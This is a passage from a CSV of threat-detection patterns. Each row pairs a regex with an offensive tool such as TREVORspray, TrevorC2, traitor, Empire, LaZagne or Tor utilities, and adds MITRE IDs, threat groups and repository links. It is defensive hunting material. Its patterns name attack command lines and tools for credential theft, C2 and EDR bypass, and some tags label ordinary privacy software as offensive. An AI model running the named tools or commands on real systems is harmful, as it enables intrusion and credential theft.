Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-visible*",".{0,1000}tor2web\-visible.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*TORAnonymizer.ps1*",".{0,1000}TORAnonymizer\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*TorBrowser-*macos_ALL.dmg*",".{0,1000}TorBrowser\-.{0,1000}macos_ALL\.dmg.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*torbrowser-install-*_ALL.exe",".{0,1000}torbrowser\-install\-.{0,1000}_ALL\.exe","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*torbrowser-install-win*.exe*",".{0,1000}torbrowser\-install\-win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*tor-browser-linux*_ALL.tar.xz*",".{0,1000}tor\-browser\-linux.{0,1000}_ALL\.tar\.xz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*torEd25519*",".{0,1000}torEd25519.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*tor-geoipdb:all*",".{0,1000}tor\-geoipdb\:all.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*tor-geoipdb:amd64*",".{0,1000}tor\-geoipdb\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*torify curl *",".{0,1000}torify\scurl\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torify ghaur *",".{0,1000}torify\sghaur\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torify nuclei *",".{0,1000}torify\snuclei\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torify sqlmap *",".{0,1000}torify\ssqlmap\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*torproject*",".{0,1000}torproject.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*torproject.org/dist/torbrowser/*.*",".{0,1000}torproject\.org\/dist\/torbrowser\/.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*--tor-proxy*--pwndb*",".{0,1000}\-\-tor\-proxy.{0,1000}\-\-pwndb.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*TorPylle*",".{0,1000}TorPylle.{0,1000}","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","1","95","20","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z" "*TorServiceSetup*",".{0,1000}TorServiceSetup.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","0","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" 
"*torsocks:amd64*",".{0,1000}torsocks\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Total number of passwords to test: *",".{0,1000}Total\snumber\sof\spasswords\sto\stest\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*totally legit pdf.pdf*",".{0,1000}totally\slegit\spdf\.pdf.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*tothi/dll-hijack-by-proxying*",".{0,1000}tothi\/dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*toto %3e c:\\temp\\toto.txt*",".{0,1000}toto\s\%3e\sc\:\\\\temp\\\\toto\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - 
T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*tplmap*",".{0,1000}tplmap.{0,1000}","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3630","662","2024-04-21T14:47:13Z","2016-07-06T20:33:18Z" "*tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq*",".{0,1000}tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*trailofbits/onesixtyone*",".{0,1000}trailofbits\/onesixtyone.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*trainr3kt/MemReader_BoF*",".{0,1000}trainr3kt\/MemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*trainr3kt/Readfile_BoF*",".{0,1000}trainr3kt\/Readfile_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","19","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*traitor -a *",".{0,1000}traitor\s\-a\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor --any *",".{0,1000}traitor\s\-\-any\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor -e *",".{0,1000}traitor\s\-e\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor --exploit*",".{0,1000}traitor\s\-\-exploit.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*traitor -p *",".{0,1000}traitor\s\-p\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*tree_connect_andx_request*",".{0,1000}tree_connect_andx_request.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Trevohack/DynastyPersist*",".{0,1000}Trevohack\/DynastyPersist.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" 
"*TrevorC2*",".{0,1000}TrevorC2.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","10","10","1177","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" "*trevorproxy ssh*",".{0,1000}trevorproxy\sssh.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorproxy subnet*",".{0,1000}trevorproxy\ssubnet.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorsaudi/Mshikaki*",".{0,1000}trevorsaudi\/Mshikaki.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. 
Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*trevorspray -*",".{0,1000}trevorspray\s\-.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray *--recon *",".{0,1000}trevorspray\s.{0,1000}\-\-recon\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*trevorspray -u *",".{0,1000}trevorspray\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*trevorspray.cli*",".{0,1000}trevorspray\.cli.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.enumerators*",".{0,1000}trevorspray\.enumerators.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.looters*",".{0,1000}trevorspray\.looters.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.py*",".{0,1000}trevorspray\.py.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray.sprayers*",".{0,1000}trevorspray\.sprayers.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray/existent_users.txt*",".{0,1000}trevorspray\/existent_users\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a 
modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*trevorspray/valid_logins.txt*",".{0,1000}trevorspray\/valid_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TREVORspray-dev*",".{0,1000}TREVORspray\-dev.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TREVORspray-master*",".{0,1000}TREVORspray\-master.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TREVORspray-trevorspray*",".{0,1000}TREVORspray\-trevorspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*tricks01.hwtxt*",".{0,1000}tricks01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*trickster0/EDR_Detector*",".{0,1000}trickster0\/EDR_Detector.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*trickster0/Enyx*",".{0,1000}trickster0\/Enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*trickster0/TartarusGate*",".{0,1000}trickster0\/TartarusGate.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*Trojan.Lazagne*",".{0,1000}Trojan\.Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*Trojan:Win32/TurtleLoader.*",".{0,1000}Trojan\:Win32\/TurtleLoader\..{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*TR-SLimey/wraith-RAT*",".{0,1000}TR\-SLimey\/wraith\-RAT.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written 